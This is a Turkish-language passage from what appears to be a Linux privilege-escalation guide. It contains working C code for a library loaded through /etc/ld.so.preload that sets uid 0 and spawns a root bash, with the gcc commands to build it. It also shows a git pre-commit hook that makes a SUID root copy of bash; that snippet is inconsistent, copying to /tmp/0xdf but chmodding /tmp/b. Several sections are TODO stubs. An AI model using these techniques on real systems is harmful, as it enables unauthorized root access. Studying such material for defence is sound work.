/etc/ld.so.preload

Bu dosya, LD_PRELOAD ortam değişkeni gibi davranır ancak aynı zamanda SUID ikili dosyalarında da çalışır. Eğer bu dosyayı oluşturabilir veya değiştirebilirseniz, her yürütülen ikili dosyayla birlikte yüklenecek bir kütüphane yolunu ekleyebilirsiniz.

Örneğin: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git kancaları

Git kancaları, bir dizin oluşturulduğunda veya bir birleştirme işlemi gerçekleştiğinde gibi bir git deposundaki çeşitli olaylar üzerinde çalıştırılan betiklerdir. Dolayısıyla, bir özelliği olan betik veya kullanıcı bu işlemleri sıkça gerçekleştiriyorsa ve .git klasörüne yazma izni varsa, bu ağır ayrıcalık yükseltme için kullanılabilir.

Örneğin, bir yeni bir işlem oluşturulduğunda her zaman çalıştırılan bir betik oluşturmak mümkündür:

```bash echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit chmod +x pre-commit ``` ### Cron & Zaman Dosyaları

TODO

Servis & Soket Dosyaları

TODO

binfmt_misc

/proc/sys/fs/binfmt_misc konumunda bulunan dosya, hangi tür dosyanın hangi ikili dosyanın çalıştırılması gerektiğini belirtir. TODO: Bir yaygın dosya türü açıldığında bir ters shell çalıştırmak için bunu kötüye kullanmak için gereksinimleri kontrol edin.